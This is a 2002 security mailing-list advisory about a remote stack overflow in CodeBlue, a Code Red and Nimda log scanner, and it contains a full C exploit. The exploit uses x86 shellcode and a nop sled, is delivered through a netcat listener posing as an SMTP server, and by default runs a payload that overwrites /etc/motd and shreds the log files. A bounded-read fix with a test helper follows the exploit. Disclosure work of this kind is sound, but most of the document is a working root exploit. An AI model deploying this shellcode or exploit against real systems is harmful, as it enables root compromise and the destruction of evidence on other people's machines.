[EXPL] CodeBlue Vulnerable to an Exploitable Buffer Overflow
From: support@securiteam.com  Date: 02/17/02
From: support@securiteam.com To: list@securiteam.com Date: Sun, 17 Feb 2002 17:25:13 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
CodeBlue Vulnerable to an Exploitable Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://freshmeat.net/projects/codeblue/> CodeBlue is an attempt to
increase the awareness of hosts that are infected with malicious worms by
scanning Apache log files and emailing the infected hosts with details of
their infection and how to obtain help removing the worm. Currently,
CodeBlue scans Apache logs for Code Red, Code Red 2, and Nimda. A security
vulnerability in the product allows remote attackers to crash the program
or execute arbitrary commands: get_smtp_reply() reads the mail server's
reply one byte at a time into a fixed 1024-byte stack buffer until it sees
a carriage return or line feed, with no length check, so an attacker who
appears in the Apache log as an infected host and answers CodeBlue's
notification connection with an overlong SMTP reply overflows the stack.
Because CodeBlue refuses to run as anything but root, the commands run
with root privileges.
DETAILS
Exploit code:
/*
 * Demonstration linux-x86 remote root against codeblue v1.1 (from file header)
 * Otherwise it's known as CodeBlue v4
 *
 * This is rather trivial to exploit...
 *
 * From get_smtp_reply()
 *
 * "We'll loop infinately, receiving
 * 1 byte at a time until we receive a carriage return
 * or line-feed character, signifying the end of the output"
 *
 * The stack looks like
 *
 * int get_smtp_reply(int sd)
 * {
 *     char response[1024];
 *     char reply_message[1024];
 *     ...
 * I probably don't have to mention it, but it reads the response into response.
 *     ...
 *
 * Also, since this is meant to increase security a little, why doesn't it
 * filter non-alphanumeric chars? Also, since it is playing with untrusted
 * data, why doesn't it drop uids, instead of insisting on running as root?
 *
 *     if ((userid = getuid()) != 0) {
 *         fprintf(stderr, "uid %d is invalid!\n", userid);
 *         fprintf(stderr, "This program MUST be run as root\n");
 *         exit(1);
 *     }
 *
 * Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
 * Now you could do (on another terminal)
 * printf "GET /default.ida?NNNNNN HTTP/1.0\n\n" | nc remotehost 80
 * and wait until codeblue runs.
 *
 * Granted, nc makes it remote, but why reinvent the wheel?
 *
 * Oh, and by the way, you'll most likely have to change the offset down there.
 * Lots of improvements could (well, have) be done, such as a select(), read(),
 * write(), so you can get a remote terminal... at the moment, all it'll do
 * is make the id command display. Brute force is interesting, because you
 * have to wait until it's run. I suspect, though I haven't tried, you could
 * almost double the nop size by playing around with reply_message.
 *
 * If you had a sense of humour, you probably could turn this into a worm. This
 * is one of the reasons I don't really like automated response/attack software.
 * Or you could just trojan/modify your existing smtp to do this whenever it
 * receives a HELO localhost...
 *
 * The interesting part of this is the bug in codeblue helped me win
 * a wargame. We were given root on a box in a lan, and got to penetrate
 * several others. Since the person running it was sick of being scanned by
 * the various worms, he was running this....
 *
 * Now for the paranoia part, how many of those scans have you received were
 * to check if you were running CodeBlue?
 *
 * laters,
 * -- Andrew Griffiths
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

/* The shellcode beats doing a bindshell/connect code, since codeblue already is
 * talking to our (supposed) smtp server, so all we have to do is redirect
 * stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
 * mine.)
 */
unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) */
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x05"
"\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
/* Standard aleph1 shellcode */
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c"
"\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08"
"\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80"
"\xe8\xde\xff\xff\xff/bin/sh";

int main(void)
{
    unsigned char buf[3000];

    memset(buf, 0, 3000);
    memset(buf, 0x90, 967);                          /* nop sled */
    /* shellcode follows the sled (strlen(sc) == 69, so it ends at buf[1035]) */
    strncpy((char *)buf + 967, (const char *)sc, strlen((const char *)sc));
    fprintf(stderr, "buf: %s\n", buf);
    fprintf(stderr, "strlen(buf): %zu\n", strlen((const char *)buf));
    /* saved return address of get_smtp_reply(): adjust this offset per target */
    buf[1036] = 0xd0;
    buf[1037] = 0xdf;
    buf[1038] = 0xff;
    buf[1039] = 0xbf;
#ifdef ICANMODIFYCCODEORMODIFYCOMPILETIMEFLAGS
    strcpy((char *)buf + 1040, " id");
#else
    strcpy((char *)buf + 1040, " echo warning codeblue has a remote root hole in it >/etc/motd; shred -z codeblue*log* 2>/dev/null; rm -f codeblue*log* 2>/dev/null; echo you sux. RTFC...");
#endif
    /* the whole thing goes to stdout, which nc -l -p 25 hands to codeblue as the smtp reply */
    printf("%s", buf);
    return 0;
}
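A bounded replacement for the reading pattern quoted in the comment above, as an added example that is not CodeBlue's own code; get_smtp_reply_bounded, the REPLY_* status values, reply_out and the pipe-fed test helper are this example's own names. The loop in the advisory keeps storing bytes until a CR or LF arrives, so a reply longer than 1024 bytes runs off the end of response[]; the version below stops at the buffer limit and reports the overlong line instead, and it keeps the buffer NUL-terminated on every exit path.

```c
#include <errno.h>
#include <string.h>
#include <unistd.h>

#define REPLY_OK        0
#define REPLY_TOO_LONG -1   /* line exceeded the buffer: rejected, not overflowed */
#define REPLY_IO_ERROR -2   /* EOF or read() failure before a terminator */

/* Bounded version of the loop the advisory quotes: still one byte at a time
 * until CR or LF, but at most cap-1 bytes are stored, so an overlong reply
 * from a hostile mail server cannot run past the caller's fixed-size stack
 * buffer. response is always NUL-terminated when this returns. */
int get_smtp_reply_bounded(int sd, char *response, size_t cap)
{
    size_t len = 0;
    unsigned char c;
    if (cap == 0) return REPLY_TOO_LONG;
    for (;;) {
        ssize_t n = read(sd, &c, 1);
        if (n < 0 && errno == EINTR) continue;
        response[len] = '\0';                          /* keep the partial line terminated */
        if (n <= 0) return REPLY_IO_ERROR;
        if (c == '\r' || c == '\n') return REPLY_OK;   /* end of the reply line */
        if (len + 1 >= cap) return REPLY_TOO_LONG;     /* the check CodeBlue's loop lacked */
        response[len++] = (char)c;
    }
}

char reply_out[1024];   /* destination, sized like CodeBlue's response[] */

/* Test helper: push a constructed reply through a pipe into the reader.
 * With data == NULL it sends n filler bytes followed by LF (n < 4095). */
int read_constructed_reply(const char *data, size_t n)
{
    static char filler[4096];
    int fds[2], ok, rc;
    if (data == NULL) {
        memset(filler, 'A', n);
        filler[n++] = '\n';
        data = filler;
    }
    if (pipe(fds) != 0) return REPLY_IO_ERROR;
    ok = write(fds[1], data, n) == (ssize_t)n;
    close(fds[1]);
    rc = ok ? get_smtp_reply_bounded(fds[0], reply_out, sizeof reply_out)
            : REPLY_IO_ERROR;
    close(fds[0]);
    return rc;
}
```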
ADDITIONAL INFORMATION
The information has been provided by <mailto:andrewg@tasmail.com> Andrew Griffiths.